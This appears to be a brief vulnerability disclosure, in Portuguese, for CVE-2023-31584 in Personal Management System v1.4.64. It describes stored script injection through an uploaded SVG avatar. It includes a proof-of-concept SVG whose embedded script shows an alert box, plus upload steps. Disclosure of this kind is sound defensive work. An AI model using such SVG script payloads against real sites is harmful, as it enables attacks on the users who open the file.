
Public disclosure for CVE-2023-31584.
Uma vulnerabilidade de upload arbitrário de arquivos no Personal Management System v1.4.64 permite que atacantes executem código arbitrário através do upload de um arquivo SVG manipulado no avatar do perfil do usuário.
[Informações Adicionais] 1.) Crie alert.svg com o seguinte conteúdo:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) Hospede o .SVG em um servidor web.
3.) Faça upload do .SVG como imagem de avatar. 4.) Quando um usuário abre o avatar em uma aba separada, o javascript armazenado no arquivo .SVG é executado.
Referências: https://github.com/Volmarg/personal-management-system